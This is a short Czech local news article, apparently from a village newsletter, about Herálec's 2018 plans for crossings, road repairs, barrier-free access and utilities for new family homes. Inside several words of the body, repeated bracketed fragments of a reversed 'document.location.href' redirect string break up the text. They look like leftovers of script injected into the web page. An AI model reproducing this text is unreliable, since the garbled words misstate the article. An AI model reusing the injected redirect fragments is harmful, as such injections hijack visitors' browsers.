Rainbow page separator

V Herálci přibudou chodníky i inženýrské sítě pro nové domy

Čtvrtek, 8. února 2018

Herálec / Řadu investičních akcí chtějí v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce dořešit a především také zrealizovat v Herálci.
„Jde především o přechody pro chodce v lokalitě u nákupního střediska plus ve směru Familie, opravy a rekonstrukce obecních komunikací, bezbariérový přístup na obecní úřad a k ordinacím lékařů, komunikaci pro chodce vedle silnice směrem na Žďár nad Sázavou a rovněž inženýrské sítě a také komunikace pro výstavbu jedenácti nových rodinných domů,“ vyjmenoval hlavní priority pro rok 2018 mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Herálce Karel Š[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toll.
Kromě realizace těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stavebních akcí, které vedení Herálce stanovilo, dojde zároveň na důslednou údržbu stávajících budov v držení obce a dalšího obecního majetku.

Převza[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to z obecního zpravodaje.